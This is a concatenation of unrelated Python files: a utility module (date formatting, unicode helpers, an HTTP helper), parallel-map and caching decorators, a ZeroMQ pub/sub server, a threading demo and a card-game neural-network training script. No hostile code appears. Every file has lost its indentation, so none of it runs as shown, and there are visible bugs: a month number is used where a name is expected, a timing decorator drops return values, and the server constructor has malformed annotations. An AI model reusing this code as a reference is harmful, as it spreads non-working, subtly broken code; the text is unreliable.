thread = Process(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
"""Formats the given date (which should be GMT).
By default, we return a relative time (e.g., "2 minutes ago"). You
can return an absolute date string with ``relative=False``.
You can force a full format date ("July 10, 1980") with
``full_format=True``.
This method is primarily intended for dates in the past.
For dates in the future, we fall back to full format.
From tornado
"""
if not date:
return '-'
if isinstance(date, float) or isinstance(date, int):
date = datetime.datetime.utcfromtimestamp(date)
now = datetime.datetime.utcnow()
if date > now:
if relative and (date - now).seconds < 60:
# Due to click skew, things are some things slightly
# in the future. Round timestamps in the immediate
# future down to now in relative mode.
date = now
else:
# Otherwise, future dates always use the full format.
full_format = True
local_date = date - datetime.timedelta(minutes=gmt_offset)
local_now = now - datetime.timedelta(minutes=gmt_offset)
local_yesterday = local_now - datetime.timedelta(hours=24)
difference = now - date
seconds = difference.seconds
days = difference.days
format = None
if not full_format:
if relative and days == 0:
if seconds < 50:
return ("1 second ago" if seconds <= 1 else
"%(seconds)d seconds ago") % {"seconds": seconds}
if seconds < 50 * 60:
minutes = round(seconds / 60.0)
return ("1 minute ago" if minutes <= 1 else
"%(minutes)d minutes ago") % {"minutes": minutes}
hours = round(seconds / (60.0 * 60))
return ("1 hour ago" if hours <= 1 else
"%(hours)d hours ago") % {"hours": hours}
if days == 0:
format = "%(time)s"
elif days == 1 and local_date.day == local_yesterday.day and \
relative:
format = "yesterday" if shorter else "yesterday at %(time)s"
elif days < 5:
format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
elif days < 334: # 11mo, since confusing for same month last year
format = "%(month_name)s-%(day)s" if shorter else \
"%(month_name)s-%(day)s at %(time)s"
if format is None:
format = "%(month_name)s %(day)s, %(year)s" if shorter else \
"%(month_name)s %(day)s, %(year)s at %(time)s"
str_time = "%d:%02d" % (local_date.hour, local_date.minute)
return format % {
"month_name": local_date.month - 1,
"weekday": local_date.weekday(),
"day": str(local_date.day),
"year": str(local_date.year),
"time": str_time
}
class TimeoutError(Exception):
pass
try:
import signal
if not hasattr(signal, 'SIGALRM'):
raise ImportError('signal')
class timeout:
"""
Time limit of command
with timeout(3):
time.sleep(10)
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
if self.seconds:
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
if self.seconds:
signal.alarm(0)
except ImportError:
class timeout:
"""
Time limit of command (for windows)
"""
def __init__(self, seconds=1, error_message='Timeout'):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def utf8(string):
"""
Make sure string is utf8 encoded bytes.
If parameter is a object, object.__str__ will been called before encode as bytes
"""
if string is None:
return string
if isinstance(string, six.text_type):
return string.encode('utf8')
elif isinstance(string, six.binary_type):
return string
elif isinstance(string, bytearray):
return six.binary_type(string)
else:
return unicode(string).encode('utf8')
def binary_data(string):
"""
Make sure the result is a bytearray.
If parameter is a object, object.__str__ will been called before encode as bytes
"""
if string is None:
return string
if isinstance(string, six.text_type):
return bytearray(string.encode('utf8'))
elif isinstance(string, six.binary_type):
return bytearray(string)
elif isinstance(string, bytearray):
return string
else:
return bytearray(unicode(string).encode('utf8'))
def text(string, encoding='utf8'):
"""
Make sure string is unicode type, decode with given encoding if it's not.
If parameter is a object, object.__str__ will been called
"""
if string is None:
return string
if isinstance(string, six.text_type):
return string
elif isinstance(string, six.binary_type):
return string.decode(encoding)
elif isinstance(string, bytearray):
return six.binary_type(string).decode(encoding)
else:
return six.text_type(string)
def pretty_unicode(string):
"""
Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed.
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return string.decode('Latin-1').encode('unicode_escape')
def unicode_string(string):
"""
Make sure string is unicode, try to default with utf8, or base64 if failed.
can been decode by `decode_unicode_string`
"""
if string is None:
return string
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]'
def unicode_dict(_dict):
"""
Make sure keys and values of dict is unicode.
"""
r = {}
for k, v in iteritems(_dict):
r[unicode_string(k)] = unicode_obj(v)
return r
def unicode_list(_list):
"""
Make sure every element in list is unicode. bytes will encode in base64
"""
return [unicode_obj(x) for x in _list]
def unicode_obj(obj):
"""
Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64.
Can been decode by `decode_unicode_obj`
"""
if obj is None:
return obj
if isinstance(obj, dict):
return unicode_dict(obj)
elif isinstance(obj, (list, tuple)):
return unicode_list(obj)
elif isinstance(obj, six.string_types):
return unicode_string(obj)
elif isinstance(obj, (int, float)):
return obj
elif obj is None:
return obj
else:
return obj
def decode_unicode_string(string):
"""
Decode string encoded by `unicode_string`
"""
if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'):
return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')])
return string
def decode_unicode_obj(obj):
"""
Decode unicoded dict/list/tuple encoded by `unicode_obj`
"""
if isinstance(obj, dict):
r = {}
for k, v in iteritems(obj):
r[decode_unicode_string(k)] = decode_unicode_obj(v)
return r
elif isinstance(obj, six.string_types):
return decode_unicode_string(obj)
elif isinstance(obj, (list, tuple)):
return [decode_unicode_obj(x) for x in obj]
else:
return obj
class Get(object):
"""
Lazy value calculate for object
"""
def __init__(self, getter):
self.getter = getter
def __get__(self, instance, owner):
return self.getter()
class ObjectDict(dict):
"""
Object like dict, every dict[key] can visite by dict.key
If dict[key] is `Get`, calculate it's value.
"""
def __getattr__(self, name):
ret = self.__getitem__(name)
if hasattr(ret, '__get__'):
return ret.__get__(self, ObjectDict)
return ret
def load_object(name):
"""Load object from module"""
if "." not in name:
raise Exception('load object need module.object')
module_name, object_name = name.rsplit('.', 1)
if six.PY2:
module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1)
else:
module = __import__(module_name, globals(), locals(), [object_name])
return getattr(module, object_name)
def get_python_console(namespace=None):
"""
Return a interactive python console instance with caller's stack
"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
shell = TerminalInteractiveShell(user_ns=namespace)
except ImportError:
try:
import readline
import rlcompleter
readline.set_completer(rlcompleter.Completer(namespace).complete)
readline.parse_and_bind("tab: complete")
except ImportError:
pass
import code
shell = code.InteractiveConsole(namespace)
shell._quit = False
def exit():
shell._quit = True
def readfunc(prompt=""):
if shell._quit:
raise EOFError
return six.moves.input(prompt)
# inject exit method
shell.ask_exit = exit
shell.raw_input = readfunc
return shell
def python_console(namespace=None):
"""Start a interactive python console with caller's stack"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
return get_python_console(namespace=namespace).interact()
def millis_now():
return int(time.time() * 1000)
def gen_uuid():
return str(uuid.uuid4())[-12:]
def asciifyUrl(url, forceQuote=False):
"""
Attempts to make a unicode URL usuable with ``urllib/urllib2``.
More specifically, it attempts to convert the unicode object ``url``,
which is meant to represent a IRI, to an unicode object that,
containing only ASCII characters, is a valid URI. This involves:
* IDNA/Puny-encoding the domain name.
* UTF8-quoting the path and querystring parts.
See also RFC 3987.
Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/
>>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com')
u'http://www.xn--uuraj-gxa24d.com'
"""
import urlparse
parts = urlparse.urlsplit(url)
if not parts.scheme or not parts.netloc:
# apparently not an url
return url
# idna-encode domain
hostname = parts.hostname.encode("idna")
# UTF8-quote the other parts. We check each part individually if
# if needs to be quoted - that should catch some additional user
# errors, say for example an umlaut in the username even though
# the path *is* already quoted.
def quote(s, safe, forceQuote=False):
s = s or ''
# Triggers on non-ascii characters - another option would be:
# urllib.quote(s.replace('%', '')) != s.replace('%', '')
# which would trigger on all %-characters, e.g. "&".
if s.encode("ascii", "replace") != s or forceQuote:
return urllib.quote(s.encode('utf8'), safe=safe)
return s
username = quote(parts.username, '')
password = quote(parts.password, safe='')
path = quote(parts.path, safe='/')
query = quote(parts.query, safe="&=;/", forceQuote=True)
# put everything back together
netloc = hostname
if username or password:
netloc = '@' + netloc
if password:
netloc = ':' + password + netloc
netloc = username + netloc
if parts.port:
netloc += ':' + str(parts.port)
return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment])
def simweb(url, data=None, is_json=False, timeout=5):
"""
@url:请求URL
@data:如果不为空使用POST并指定post数据为data
@is_json: 如果为True,会将data的数据json.dumps
@timeout:设置超时时间
return: 返回格式 source,code 二元组
"""
try:
import urllib2
opener = urllib2.build_opener()
url = asciifyUrl(url)
if data:
if is_json:
data = json.dumps(data)
Req = urllib2.Request(url, data)
Req.add_header('Content-type', "application/x-www-form-urlencoded")
else:
Req = urllib2.Request(url)
Res = opener.open(Req, timeout=timeout)
source = Res.read()
code = Res.getcode()
return source, code
except Exception as e:
logger.warn("Http Request Error:%s", e)
return None, None
def elapsed(logger=None, verbose="elapsed time: %f s"):
"""
Tell us a function performed how many milliseconds.
if logger is given,it will write in the logger,otherwith
it will use print method.
the verbose is logger format,must have a %f falg.
@elapsed
def fun():
pass
"""
def _elapsed(func):
@functools.wraps(func)
def _elapsed(*args, **kw):
start = time.time()
func(*args, **kw)
end = time.time()
secs = end - start
msecs = secs * 1000
if logger:
logger.debug(verbose % secs)
else:
print(verbose % secs)
return _elapsed
return _elapsed
|
performance.py | # -*- coding: utf-8 -*-
import numpy as np
import warnings
import multiprocessing as mp
def pmap(function, *arguments, **kwargs):
"""
Parallelized version of map. It calls function on arguments using numprocesses threads.
Also try the numexpr package or numba, which are easy to use and may give you better
performance.
Parameters
----------
function : function
The function to call.
arguments : sequence(s)
One or more sequences, which are passed to the function. If N sequences are
provided, function is called with N arguments.
numprocesses : int, optional (default = None)
The number of processes to keep busy. If None, the number of CPUs is used.
nchunks: int, optional (default = None)
The number of chunks in which the arguments are split.
By default this is set to the number of processes, but sometimes you want
fewer chunks, so that they do not become too short.
Returns
-------
results : list or ndarray
The values returned by the function calls, as would be done by
map(function, *arguments). If async is True, the order of the results is
arbitrary. If the first of arguments is an ndarray, the result is converted to an
ndarray.
Notes
-----
Uses multiprocessing queues to create parallel version of map.
Note that, for pmap to be useful, the function itself (applied on one input) should be time consuming and hard to optimize.
Pmap is not beneficial in case of a cheap function and huge number of inputs.
In this case it is much better to run the function in a lower level, e.g. via numpy vectorization.
Limitations
-----------
The function needs to be a pure function, which means that
it may not manipulate a shared global state during its calls.
For example, you cannot use a function that computes a sum over the arguments.
Examples
--------
>>> def f(x): return x*x
>>> pmap(f, (1, 2, 3))
[1, 4, 9]
See Also
--------
multiprocessing
"""
assert len(arguments) > 0, "at least one iterable argument is required"
assert all(np.iterable(args) for args in arguments), "arguments must be iterable"
length = len(arguments[0])
assert all(length == len(args) for args in arguments[1:]), "all arguments must have same length"
numprocesses = kwargs.get("numprocesses", mp.cpu_count())
nchunks = kwargs.get("nchunks", numprocesses)
chunksize = kwargs.get("chunksize", None)
if chunksize is not None:
warnings.warn("chunksize keyword is deprecated, please use nchunks keyword",
DeprecationWarning)
nchunks = chunksize
if not kwargs.get("async", True):
warnings.warn("async == False is deprecated, pmap results are always in "
"correct order now",
DeprecationWarning)
nchunks = min(numprocesses, length, nchunks)
argchunks = [np.array_split(args, nchunks) for args in arguments]
def worker(f, conn):
args = conn.recv()
result = list(map(f, *args))
conn.send(result)
pipes = [mp.Pipe() for _ in range(nchunks)]
procs = [mp.Process(target=worker, args=(function, p[1])) for p in pipes]
for p in procs:
p.daemon = True
p.start()
for i, p in enumerate(pipes):
args = [args[i] for args in argchunks]
p[0].send(args)
results = [p[0].recv() for p in pipes]
for p in procs:
p.join()
first_arg = arguments[0]
if isinstance(first_arg, np.ndarray):
return np.concatenate([x for x in results], axis=0)
res = []
for r in results:
res += r
return res
def cached(keepOpen=False, lockCacheFile=False, trackCode=True):
"""
Decorator which caches the result of a slow function in an automatically
generated file in the current working directory.
Parameters
----------
keepOpen : bool, optional (default = False)
Determines whether to keep the cache file open during the whole session.
lockCacheFile : bool, optional (default = False)
Locks the cache file during access (necessary when used with pmap)
don't use this option together with keepOpen, otherwise you will get a dead lock
trackCode: bool, optional (default = True)
If true, also changes in the code will be tracked.
Returns
-------
f : decorated function
Notes
-----
This function decorators enhances a function by wrapping code around it
that implements the caching of the result. See the examples how to use it.
The decorator is able to cache the results of several individual functions
in a single script, each called with several individual arguments.
The cache is useful, for example, if you are a slow routine that generates
some data which you want to plot. Typically, the plot part needs several
development cycles to look good. While you develop the display, the slow
parts of your analysis are quickly supplied by the cache for you.
The cache file is always created in the current working directory. The
filename is cache-<script name>-<function name>.pkl. If the decorator
is used within an interactive session, the filename will be python.cache.
If you want to place and name the file yourself, use the "cached_at" decorator.
The decorator detects edits in the cached function via a hash of its byte
code. If you want to make sure that the cache is updated, please delete
the cache file manually.
Limitations
-----------
The function is only are allowed to accept and return objects
that can be handled by the pickle module. Fortunately, that is practically
everything.
Examples
--------
In order to make a cached version of a slow function, do
>>> @cached
... def slow_function1(a):
... return a
>>> @cached
... def slow_function2(b):
... return b*b
>>> slow_function1(2)
2
>>> slow_function2(2)
4
>>> slow_function1(3)
3
Any calls to slow_function1 and slow_function2 are transparently cached
from now on.
See also
--------
shelve
pickle
"""
import os
from types import FunctionType
from functools import wraps
import inspect
# To preserve backwards compatibility, calling without any arguments is
# still supported. In this case, keepOpen is the function to be cached.
if isinstance(keepOpen, FunctionType):
function = keepOpen
# check for name of script and assume interactive session otherwise
prog = inspect.getfile(function)
prog = os.path.splitext(os.path.basename(prog))[
0] if os.path.exists(prog) else "python"
cacheFileName = "cache-" + prog + "-" + function.__name__ + ".pkl"
return cached_at(cacheFileName)(function)
def decorator(function):
# check for name of script and assume interactive session otherwise
prog = inspect.getfile(function)
prog = os.path.splitext(os.path.basename(prog))[
0] if os.path.exists(prog) else "python"
cacheFileName = "cache-" + prog + "-" + function.__name__ + ".pkl"
@wraps(function)
@cached_at(cacheFileName, keepOpen, lockCacheFile, trackCode)
def decorated_function(*args, **kwargs):
return function(*args, **kwargs)
return decorated_function
return decorator
def cached_at(cacheFileName, keepOpen=False, lockCacheFile=False, trackCode=True):
"""
Decorator which caches the result of a slow function in a file.
Parameters
----------
cacheFileName : string
Path and filename of the cache file.
keepOpen : bool, optional (default = False)
Determines whether to keep the cache file open during the whole session.
lockCacheFile : bool, optional (default = False)
locks the cache file during access (necessary when used with pmap)
don't use this option together with keepOpen, otherwise you will get a dead lock
trackCode: bool, optional (default = True)
If true, also changes in the code will be tracked.
Returns
-------
f : decorated function
Notes
-----
See the decorator "cached" in this module.
Limitations
-----------
See the decorator "cached" in this module.
Examples
--------
In order to make a cached version of a slow function, do
>>> @cached_at("mycache1.tmp")
... def slow_function1(a):
... return a
>>> @cached_at("mycache2.tmp")
... def slow_function2(b):
... return b*b
>>> slow_function1(2)
2
>>> slow_function2(2)
4
>>> slow_function1(3)
3
See the decorator "cached" in this module for more information.
See also
--------
shelve
pickle
"""
from functools import wraps
if keepOpen and lockCacheFile:
raise ValueError("keepOpen cannot be used together with lockCacheFile")
if lockCacheFile:
from . import locked_shelve as shelve
else:
import shelve
if keepOpen:
# Open the shelve on function decoration
_d = shelve.open(cacheFileName, protocol=-1, writeback=False)
def decorator(function):
@wraps(function)
def decorated_function(*args, **kwargs):
from six.moves import cPickle as pickle
import six
import inspect
import hashlib
def encode(x):
if six.PY2:
return x
else:
return x.encode("utf-8")
# Pickle the function arguments to use them as key
# it is preferable not to include the function name in the pickle
# when the function name changes, the cache file name changes anyway
# if the user decides to recall the function and manually recall the
# cache, it will still work
key = str(pickle.dumps((args, kwargs), protocol=-1))
code_hash = hashlib.md5(encode(inspect.getsource(function))).digest()
if keepOpen:
d = _d # Use open shelve
else:
d = shelve.open(cacheFileName, protocol=-1, writeback=False)
create = True # this variable is necessary, cached output could be anything, also None
if key in d:
assert "cache" in d[
key], "Your cache might be outdated. Try to delete and create it again!"
if trackCode:
if code_hash in d[key]["code_hash"]:
output = d[key]["cache"]
create = False
else:
output = d[key]["cache"]
create = False
if create:
if not keepOpen:
d.close()
output = function(*args, **kwargs)
if not keepOpen:
d = shelve.open(cacheFileName, protocol=-
1, writeback=False)
if key in d:
if pickle.dumps([d[key]["cache"]], protocol=-1) == pickle.dumps([output], protocol=-1):
dk = d[key]
dk["code_hash"] += [code_hash]
d[key] = dk
else:
d[key] = {"code_hash": [code_hash], "cache": output}
else:
d[key] = {"code_hash": [code_hash], "cache": output}
if not keepOpen:
d.close()
return output
return decorated_function
return decorator
def memoized(function):
"""
Caches the output of a function in memory to increase performance.
Returns
-------
f : decorated function
Notes
-----
This decorator speeds up slow calculations that you need over and over
in a script. If you want to keep the results of a slow function for
several script executions, use the "cached" decorator instead
(which also allows mutable arguments).
Limitations
-----------
Use this decorator only for functions with immutable arguments, like
numbers, tuples, and strings. The decorator is intended for simple
mathematical functions and optimized for performance.
"""
from functools import wraps
cache = {}
@wraps(function)
def decorated_function(*args):
if args in cache:
output = cache[args]
else:
output = function(*args)
cache[args] = output
return output
return decorated_function
|
__init__.py | from os import truncate
import signal
import threading
import traceback
from datetime import datetime, timedelta
from functools import lru_cache
from typing import Any, Callable, Dict
from pathlib import Path
import zmq
# Achieve Ctrl-c interrupt recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
KEEP_ALIVE_TOPIC: str = "_keep_alive"
KEEP_ALIVE_INTERVAL: timedelta = timedelta(seconds=1)
KEEP_ALIVE_TOLERANCE: timedelta = timedelta(seconds=30)
class RemoteException(Exception):
"""
RPC remote exception
"""
def __init__(self, value: Any):
"""
Constructor
"""
self.__value = value
def __str__(self):
"""
Output error message
"""
return self.__value
class MqServer:
""""""
def __init__(self):
"""
Constructor
"""
# Zmq port related
self.__context: zmq.Context = zmq.Context()
# Subscribe socket (subscribe pattern)
self.__socket_subscribe: zmq.Socket = self.__context.socket(zmq.SUB)
# Publish socket (Publish pattern)
self.__socket_pubish: zmq.Socket = self.__context.socket(zmq.PUB)
self.__reconnect_num:0
# monitor socket
self.__socket_monitor:None
# Worker thread related
self.__active: bool = False # MqServer status
self.__thread: threading.Thread = None # MqServer thread
self.__lock: threading.Lock = threading.Lock()
def is_active(self) -> bool:
""""""
return self.__active
def start(
self,
subscribe_address: str,
publish_address: str
# server_secretkey_path: str = "",
# username: str = "",
# password: str = ""
) -> None:
"""
Start RpcServer
"""
if self.__active:
return
# Bind and Listen
self.__socket_subscribe.connect(subscribe_address)
self.__socket_pubish.bind(publish_address)
# set monitor
self.set_monitor()
# Start MqServer status
self.__active = True
# Start RpcServer thread
self.__thread = threading.Thread(target=self.run)
self.__thread.start()
def stop(self) -> None:
"""
Stop RpcServer
"""
if not self.__active:
return
# Stop RpcServer status
self.__active = False
def join(self) -> None:
# Wait for RpcServer thread to exit
if self.__thread and self.__thread.is_alive():
self.__thread.join()
self.__thread = None
def run(self) -> None:
print("run")
pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)
while self.__active:
if not self.__socket_subscribe.poll(pull_tolerance):
self.on_disconnected()
continue
# Receive request data from Reply socket
topic, msg = self.__socket_subscribe.recv_multipart()
print("have resp")
# Process data by callable function
self.callback(topic, msg)
# Close And Unbind
self.__socket_subscribe.close()
self.__socket_pubish.unbind(self.__socket_pubish.LAST_ENDPOINT)
def publish(self, topic: str, data: Any) -> None:
"""
Publish data
"""
with self.__lock:
self.__socket_pubish.send_pyobj([topic, data])
def callback(self, topic: str, data: Any) -> None:
"""
Callable function
"""
raise NotImplementedError
def subscribe_topic(self, topics=[]) -> None:
"""
Subscribe data
"""
if len(topics) == 0:
print("Receiving messages on ALL topics...")
self.__socket_subscribe.setsockopt(zmq.SUBSCRIBE, b'')
else:
print("Receiving messages on topics: %s ..." % topics)
for t in topics:
self.__socket_subscribe.setsockopt(zmq.SUBSCRIBE, t.encode('utf-8'))
def set_reconnect(self) -> None:
pass
def set_monitor(self):
self.__socket_monitor = self.__socket_subscribe.get_monitor_socket()
def on_disconnected(self):
"""
Callback when heartbeat is lost.
"""
print("RpcServer has no response over {tolerance} seconds, please check you connection."
.format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))
|
execution_scheduling.py | '''
Este snipet tienei como propósito realiar un estudio de el agendamiento delas creación de threads.
'''
#!/usr/bin/env python3
""" Two threads chopping vegetables """
import threading
import time
chopping = True
def vegetable_chopper():
name = threading.current_thread().getName()
vegetable_count = 0
while chopping:
print(name, 'chopped a vegetable!')
vegetable_count += 1
print(name, 'chopped', vegetable_count, 'vegetables.')
if __name__ == '__main__':
threading.Thread(target=vegetable_chopper, name='Barron').start() # Proceso 1
threading.Thread(target=vegetable_chopper, name='Olivia').start() # Proceso 2
time.sleep(1) # chop vegetables for 1 second
chopping = False # stop both threads from chopping para el wile en ambso threads.
|
AcimdesTrainingServer.py | import random
from typing import List
import NeuralNetwork as nn
import os
import multiprocessing as mp
import threading as thrd
import pickle
import time
class Cards:
def __init__(self):
self.cards = []
for _ in range(4):
temp = random.sample(range(8), 8)
for j in temp:
self.cards.append(j)
def lastcard(self):
last = self.cards[-1]
self.cards.pop()
return last
class Player:
def __init__(self, username, nn: nn.NeuralNetwork):
self.username = username
self.cardsInHand = []
self.takenCards = [0]*8
self.score = 0
self.isLast = False
self.isFirst = False
self.takesTheHand = False
self.playingNetwork = nn
def __str__(self):
return self.username
def __eq__(self, other):
if isinstance(other, str):
return self.username == other
if isinstance(other, Player):
return self.username == other.username
return False
def throwcard(self, n):
card = self.cardsInHand[n]
self.cardsInHand.pop(n)
return card
class Game:
def __init__(self, players: List[Player]):
self.cardsRoman = ['VII', 'VIII', 'IX', 'X', 'D', 'B', 'K', 'A']
self.allowedInput: List[str] = ['0', '1', '2', '3', 'end']
self.players: List[Player] = players
self.players[random.randint(0, 3)].isFirst = True
self.cards: Cards = Cards()
self.dealCards(self.cards, self.players)
@staticmethod
def generateInputList(cardsInHand: list[int], hand: list[int], takenCards: list[int], scoreUs: int, scoreThem: int):
inputList = cardsInHand.copy()
while len(inputList) < 4:
inputList.append(-1)
inputList += hand
while len(inputList) < 19:
inputList.append(-1)
inputList += takenCards + [scoreUs, scoreThem]
return inputList
@staticmethod
def draw(cards, players):
for i in players:
i.cardsInHand.append(cards.lastcard())
@staticmethod
def dealCards(cards, players):
for _ in range(2):
for j in range(4):
players[j].cardsInHand.append(cards.lastcard())
players[j].cardsInHand.append(cards.lastcard())
@staticmethod
def sortPlayers(players: List[Player]):
for _ in range(4):
if players[0].isFirst:
break
else:
temp_p = players[0]
players.pop(0)
players.append(temp_p)
def canPlayerContinue(self, cardToBeat, first, i):
if (cardToBeat not in self.players[0].cardsInHand and not first and i == self.players[0] and
0 not in self.players[0].cardsInHand):
return True
return False
def printHand(self, hand, first):
handOut = '| '
if not first:
print("Bačene karte: ")
for n in hand:
handOut += self.cardsRoman[n] + ' | '
print(handOut)
def printPlayer(self, i):
cardsInHandOut = '| '
print(i.__str__())
for n in i.cardsInHand:
cardsInHandOut += self.cardsRoman[n] + ' | '
print("Ruka: " + cardsInHandOut)
return i.playingNetwork.runNetwork()
def printOrder(self):
print("Redoslijed igre: ")
for i in self.players:
print(f"\t- {i}")
@staticmethod
def cardTakesTheHand(thrownCard, cardToBeat, i, players):
if thrownCard == cardToBeat or thrownCard == 0:
for j in players:
j.takesTheHand = False
j.isFirst = False
i.takesTheHand = True
i.isFirst = True
@staticmethod
def pointSum(hand, players):
sumPoints = 0
for i in hand:
if i == 3 or i == 7:
sumPoints += 10
for i in players:
if i.takesTheHand:
i.score += sumPoints
players[players.index(i)-2].score += sumPoints
for j in hand:
i.takenCards[j] += 1
players[players.index(i) - 2].takenCards[j] += 1
break
def pointReset(self):
for i in self.players:
i.score = 0
def contDeal(self, firstPlayer):
if len(self.cards.cards) != 0:
for i in range(min(4-len(firstPlayer.cardsInHand), int(len(self.cards.cards)/4))):
self.draw(self.cards, self.players)
def checkCardInput(self, cardToThrow, cardToBeat, first, a, i, firstPlayer):
if cardToThrow not in self.allowedInput:
#print(f"Nedozvoljeni ulaz.")
return False
if cardToThrow == 'end':
if i != firstPlayer or first:
#print("Trenutno nije moguće završiti rundu!")
return False
return True
if int(cardToThrow) > (3-a):
#print(f"Odabrana karta nije unutar raspona.")
return False
try:
if i.cardsInHand[int(cardToThrow)] != cardToBeat and i.cardsInHand[int(cardToThrow)] != 0 and not first and i == firstPlayer:
#print(f"Odabrana karta nije ispravna.")
return False
except:
return False
return True
@property
def handplay(self):
hand = []
killCommand = False
breakHand = False
first = True
cardToBeat = None
i: Player
for i in self.players:
i.cardsInHand.sort()
# Sortiranje igrača
self.sortPlayers(self.players)
firstPlayer = self.players[0]
# Početak ruke
if len(firstPlayer.cardsInHand) != 0:
# self.printOrder()
# Krugovi
for a in range(4):
if len(self.cards.cards)%2:
killCommand = True
break
# Igrači
for i in self.players:
# Provjera može li prvi igrač nastaviti ruku
breakHand = self.canPlayerContinue(cardToBeat, first, i)
if breakHand:
# self.printHand(hand, first)
break
# self.printHand(hand, first)
#print(self.generateInputList(i.cardsInHand, hand, i.takenCards, i.score, self.players[self.players.index(i)-1].score))
cardToThrowList = i.playingNetwork.runNetwork(self.generateInputList(i.cardsInHand, hand, i.takenCards, i.score, self.players[self.players.index(i)-1].score))
cardToThrow = cardToThrowList.index(max(cardToThrowList))
if cardToThrow == 4:
cardToThrow = "end"
# print(f"{os.getpid()} {cardToThrow}")
# Provjera da li je ulaz dobar
if not self.checkCardInput(str(cardToThrow), cardToBeat, first, a, i, firstPlayer):
breakHand = True
killCommand = True
break
if cardToThrow == 'end':
breakHand = True
break
# Postavlja kartu za uzimanje
thrownCard = i.throwcard(int(cardToThrow))
if first:
cardToBeat = thrownCard
first = False
print(f"{os.getpid()} {i.username} {thrownCard}")
# Provjerava da li bačena karta uzima ruku
self.cardTakesTheHand(thrownCard, cardToBeat, i, self.players)
# Bačene karte
hand.append(thrownCard)
if breakHand:
print("Runda je završila.")
break
# Zbrajanje bodova
self.pointSum(hand, self.players)
# Dijeljenje karata
self.contDeal(firstPlayer)
if killCommand:
print(f"Remainig cards: {self.cards.cards}")
return True
if not breakHand:
print("Runda je završila.")
pass
return False
else:
print(f"Remainig cards: {self.cards.cards}")
return True
def playgame(self):
self.pointReset()
# print("[STARTING]Starting game.")
# print(f"Timovi: \n\t-{self.players[0]} i {self.players[2]}\n\t-{self.players[1]} i {self.players[3]}")
timeStart = time.time()
while not self.handplay:
pass
f = open("generationResults.txt", "ab")
save = []
if self.players[0].score > self.players[1].score:
save.append(self.players[0].playingNetwork.neuralNetwork)
save.append(self.players[2].playingNetwork.neuralNetwork)
save.append(self.players[0].score + 1 + time.time() - timeStart - len(self.cards.cards))
elif self.players[0].score < self.players[1].score:
save.append(self.players[1].playingNetwork.neuralNetwork)
save.append(self.players[3].playingNetwork.neuralNetwork)
save.append(self.players[1].score + 1 + time.time() - timeStart - len(self.cards.cards))
else:
if self.players[0].takesTheHand + self.players[2].takesTheHand:
save.append(self.players[0].playingNetwork.neuralNetwork)
save.append(self.players[2].playingNetwork.neuralNetwork)
save.append(self.players[0].score + 1 + time.time() - timeStart - len(self.cards.cards))
else:
save.append(self.players[1].playingNetwork.neuralNetwork)
save.append(self.players[3].playingNetwork.neuralNetwork)
save.append(self.players[1].score + 1 + time.time() - timeStart - len(self.cards.cards))
pickle.dump(save, f)
f.close()
def runGame(x: Game):
x.playgame()
if __name__ == "__main__":
# random.seed(2)
trainingTimeStart = time.time()
print(f"Generation: 0")
genTimeStart = time.time()
numberOfGames = 25
numberOfPlayers = numberOfGames * 4
botPlayers = [Player("bot" + str(i), nn.NeuralNetwork()) for i in range(numberOfPlayers)]
for i in range(numberOfPlayers):
botPlayers[i].playingNetwork.addInputLayer(29)
botPlayers[i].playingNetwork.addLayer(15)
botPlayers[i].playingNetwork.addLayer(15)
botPlayers[i].playingNetwork.addLayer(5)
numberOfGeneration = 1000
games = [Game([botPlayers.pop() for _ in range(4)]) for _ in range(numberOfGames)]
pool = mp.Pool()
results = pool.map(runGame, games)
print(f"Time of generation 0: {time.time() - genTimeStart}")
"""processes = []
for i in games:
processes.append(mp.Process(target=i.playgame))
processes[-1].start()
processes[-1].join()"""
"""threads = []
for i in games:
threads.append(thrd.Thread(target=i.playgame))
threads[-1].start()
threads[-1].join()"""
for i in range(numberOfGeneration):
print(f"Generation: {i + 1}")
genTimeStart = time.time()
generationResults = []
f = open("generationResults.txt", "rb")
for _ in range(numberOfGames):
try:
generationResults.append(pickle.load(f))
except:
pass
f.close()
f = open("generationResults.txt", "w")
f.close()
bestInGeneration = generationResults[0]
for j in generationResults:
if j[2] > bestInGeneration[2]:
bestInGeneration = j
botPlayers = [Player("bot" + str(j) + "_" + str(i), nn.NeuralNetwork()) for j in range(numberOfPlayers)]
for j in range(numberOfPlayers):
if j < numberOfPlayers/2:
botPlayers[j].playingNetwork.neuralNetwork = bestInGeneration[0]
else:
botPlayers[j].playingNetwork.neuralNetwork = bestInGeneration[1]
random.shuffle(botPlayers)
games = [Game([botPlayers.pop() for _ in range(4)]) for _ in range(numberOfGames)]
pool = mp.Pool()
results = pool.map(runGame, games)
print(f"Time of generation {i+1}: {time.time() - genTimeStart}")
